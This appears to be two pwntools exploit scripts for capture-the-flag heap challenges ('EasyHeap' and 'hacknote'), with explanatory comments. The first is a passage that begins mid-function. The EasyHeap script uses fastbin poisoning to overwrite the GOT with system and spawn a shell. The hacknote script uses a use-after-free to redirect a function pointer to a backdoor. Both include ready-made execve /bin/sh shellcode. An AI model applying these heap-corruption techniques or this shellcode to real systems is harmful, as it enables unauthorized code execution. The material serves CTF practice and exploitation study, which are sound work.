[ZJCTF 2019]EasyHeap
debug_str = ""
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
for i in addr:
debug_str+='b *{}\n'.format(hex(text_base+i))
gdb.attach(p,debug_str)
else:
for i in addr:
debug_str+='b *{}\n'.format(hex(i))
gdb.attach(p,debug_str)
def dbg():
    """Attach gdb to the global tube ``p`` with no breakpoint script."""
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
# Thin wrappers around the global tube ``p``. The send-side helpers coerce
# their payload with str() so that an int can be passed directly.
def s(data):
    """Send ``data`` as-is (no trailing newline)."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for ``delim`` on the tube, then send ``data``."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send ``data`` followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for ``delim``, then send ``data`` plus a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to ``numb`` bytes."""
    return p.recv(numb)


def ru(delims, drop=True):
    """Receive through ``delims``; ``drop`` is passed on to recvuntil()."""
    return p.recvuntil(delims, drop)


def it():
    """Hand the tube over to the user interactively."""
    return p.interactive()


def uu32(data):
    """Unpack a 32-bit value with u32(), right-padding short input with NULs."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack a 64-bit value with u64(), right-padding short input with NULs."""
    return u64(data.ljust(8, '\0'))


def bp(bkp):
    """Forward to ``pdbg.bp``.

    ``pdbg`` is not defined anywhere in this file, so calling this raises
    NameError unless something outside the file provides it.
    """
    return pdbg.bp(bkp)


def li(str1, data1):
    """Log ``data1`` in hex after the label ``str1``."""
    return log.success(str1 + '========>' + hex(data1))
def dbgc(addr):
    """Attach gdb to ``p``, set a single breakpoint at ``addr`` and continue."""
    script = "b*{}\n c".format(hex(addr))
    gdb.attach(p, script)
def lg(s, addr):
    """Print ``addr`` as a bold red ``<s>-->0x...`` line (ANSI escapes).

    Note that the parameter ``s`` shadows the module-level ``s`` send helper
    inside this function only.
    """
    red_bold = '\033[1;31;40m'
    reset = '\033[0m'
    body = '%20s-->0x%x' % (s, addr)
    print(red_bold + body + reset)
# Canned shellcode strings carried over from the author's template (source
# link below). Nothing in this script references them: exp() only sends
# p64()-packed values. They are written as Python 2 str literals; on
# Python 3 these would be text objects rather than bytes.
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def choice(idx):
    """Answer the "choice :" menu prompt with option number ``idx``."""
    option = str(idx)
    sa("choice :", option)
def add(sz, context):
    """Menu option 1: request an entry of ``sz`` bytes holding ``context``.

    The parameter name ``context`` shadows any module-level ``context`` object
    (pwntools' settings, if the star-import is in scope) within this function;
    here it is only the content sent at the second prompt.
    """
    choice(1)
    prompts = (
        ("Size of Heap : ", sz),
        ("Content of heap:", context),
    )
    for prompt, value in prompts:
        sa(prompt, value)
def edit(idx, sz, con):
    """Menu option 2: send a new size ``sz`` and content ``con`` for entry ``idx``."""
    choice(2)
    prompts = (
        ("Index :", idx),
        ("Size of Heap : ", sz),
        ("Content of heap : ", con),
    )
    for prompt, value in prompts:
        sa(prompt, value)
def delete(idx):
    """Menu option 3: answer the index prompt with ``idx``.

    The menu selection is sent directly here rather than via choice(); the
    bytes on the wire are the same.
    """
    sa("choice :", "3")
    sa("Index :", idx)
def exp():
    """Scripted interaction with the EasyHeap binary, as given in the writeup.

    Every numeric constant below (the sizes, the 0x71/0x61 values, 0x6020AD,
    0x601ffa and system_addr) appears to be specific to this particular binary
    and is taken verbatim from the writeup; nothing is leaked or computed at
    run time.
    """
    add(0x60,"a")#ck0
    add(0x60,"b")#ck1
    add(0x60,"c")#ck2,split
    delete(1)#fastbin[0]->ck1->null
    edit(0,0x78,'d'*0x68+p64(0x71)+p64(0x6020AD))
    add(0x60,'e')#ck1
    add(0x60,"f"*3+p64(9999))#ck3
    # These two lines are sent raw rather than through sa()/sla(): there is no
    # prompt-wait here, only a fixed one-second delay between them.
    p.sendline("4869")
    time.sleep(1)
    p.sendline(p64(1))
    add(0x50,"a")#ck4
    add(0x50,"b")#ck5
    add(0x50,"c")#ck6,split
    delete(5)#fastbin[0]->ck1->null
    edit(4,0x68,'d'*0x58+p64(0x61)+p64(0x601ffa))
    add(0x50,'/bin/sh\x00')#ck5
    # Hard-coded address; not resolved from the binary or libc at run time.
    system_addr=0x400700
    add(0x50,"f"*14+p64(system_addr))#ck3 ->got
    delete(5)
if __name__ == '__main__':
    # Run the scripted interaction, then drop into an interactive session
    # (``it`` is the p.interactive() alias defined above).
    exp()
    it()
hitcontraining_uaf
from pwn import *
import time
# pwntools settings: verbose tube I/O logging, and the terminal command that
# gdb.attach() uses to open its window (a horizontal tmux split).
context.log_level = 'debug'
context.terminal=['tmux', 'splitw', '-h']
prog = './hacknote'
#elf = ELF(prog)#nc 121.36.194.21 49155
# Local run of the target with the bundled libc injected via LD_PRELOAD; the
# remote alternative below is left commented out.
p = process(prog,env={"LD_PRELOAD":"./libc-2.23.so"})
# Parsed libc image; it is not referenced anywhere else in this script.
libc = ELF("libc-2.23.so")
#p = remote("node4.buuoj.cn",28453)#nc 124.71.130.185 49155
def debug(addr, PIE=True):
    """Attach gdb to ``p`` with one breakpoint per address in ``addr``.

    With ``PIE`` true the addresses are treated as offsets and rebased on the
    first mapping reported by ``pmap`` for the process (the line after pmap's
    header, first column, parsed as hex); otherwise they are used verbatim.
    """
    if PIE:
        mapping_line = os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1]
        base = int(mapping_line, 16)
    else:
        base = 0
    # One "b *<addr>" line per breakpoint, newline-terminated.
    script = "".join('b *{}\n'.format(hex(base + i)) for i in addr)
    gdb.attach(p, script)
def dbg():
    """Attach gdb to the global tube ``p`` with no breakpoint script."""
    gdb.attach(p)
#-----------------------------------------------------------------------------------------
# Thin wrappers around the global tube ``p``. The send-side helpers coerce
# their payload with str() so that an int can be passed directly.
def s(data):
    """Send ``data`` as-is (no trailing newline)."""
    return p.send(str(data))


def sa(delim, data):
    """Wait for ``delim`` on the tube, then send ``data``."""
    return p.sendafter(str(delim), str(data))


def sl(data):
    """Send ``data`` followed by a newline."""
    return p.sendline(str(data))


def sla(delim, data):
    """Wait for ``delim``, then send ``data`` plus a newline."""
    return p.sendlineafter(str(delim), str(data))


def r(numb=4096):
    """Receive up to ``numb`` bytes."""
    return p.recv(numb)


def ru(delims, drop=True):
    """Receive through ``delims``; ``drop`` is passed on to recvuntil()."""
    return p.recvuntil(delims, drop)


def it():
    """Hand the tube over to the user interactively."""
    return p.interactive()


def uu32(data):
    """Unpack a 32-bit value with u32(), right-padding short input with NULs."""
    return u32(data.ljust(4, '\0'))


def uu64(data):
    """Unpack a 64-bit value with u64(), right-padding short input with NULs."""
    return u64(data.ljust(8, '\0'))


def bp(bkp):
    """Forward to ``pdbg.bp``.

    ``pdbg`` is not defined anywhere in this file (and is not a name this
    script imports), so calling this raises NameError unless the pwn
    star-import happens to provide it.
    """
    return pdbg.bp(bkp)


def li(str1, data1):
    """Log ``data1`` in hex after the label ``str1``."""
    return log.success(str1 + '========>' + hex(data1))
def dbgc(addr):
    """Attach gdb to ``p``, set a single breakpoint at ``addr`` and continue."""
    script = "b*{}\n c".format(hex(addr))
    gdb.attach(p, script)
def lg(s, addr):
    """Print ``addr`` as a bold red ``<s>-->0x...`` line (ANSI escapes).

    Note that the parameter ``s`` shadows the module-level ``s`` send helper
    inside this function only.
    """
    red_bold = '\033[1;31;40m'
    reset = '\033[0m'
    body = '%20s-->0x%x' % (s, addr)
    print(red_bold + body + reset)
# Canned shellcode strings carried over from the author's template (source
# link below). Nothing in this script references them: exp() only sends
# a p32()-packed value. They are written as Python 2 str literals; on
# Python 3 these would be text objects rather than bytes.
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def choice(idx):
    """Answer the "choice :" menu prompt with option number ``idx``."""
    option = str(idx)
    sa("choice :", option)
def add(sz, context):
    """Menu option 1: request a note of ``sz`` bytes holding ``context``.

    The parameter name ``context`` shadows pwntools' module-level ``context``
    object (brought in by ``from pwn import *``) within this function; here it
    is only the content sent at the second prompt.
    """
    choice(1)
    prompts = (
        ("Note size :", sz),
        ("Content :", context),
    )
    for prompt, value in prompts:
        sa(prompt, value)
def delete(idx):
    """Menu option 2: answer the index prompt with ``idx``.

    The menu selection is sent directly here rather than via choice(); the
    bytes on the wire are the same.
    """
    sa("choice :", "2")
    sa("Index :", idx)
def show(idx):
    """Menu option 3: answer the index prompt with ``idx``.

    The menu selection is sent directly here rather than via choice(); the
    bytes on the wire are the same.
    """
    sa("choice :", "3")
    sa("Index :", idx)
def exp():
    """Scripted interaction with the hacknote binary, as given in the writeup.

    ``backdoor_addr`` is a hard-coded constant for this specific binary;
    nothing is leaked or computed at run time.
    """
    add(0x40,'aaaa')#H0 to give more fastbin[0],ck0,ck1
    add(0x40,'bbbb')#H1 to give more fastbin[0],ck2,ck3
    delete(0)
    delete(1)
    # Python 2 builtin: blocks until Enter is pressed (a manual pause). On
    # Python 3 this name does not exist and raises NameError.
    raw_input()
    backdoor_addr=0x8048945
    add(8,p32(backdoor_addr))
    show(0)
if __name__ == '__main__':
    # Run the scripted interaction, then drop into an interactive session
    # (``it`` is the p.interactive() alias defined above).
    exp()
    it()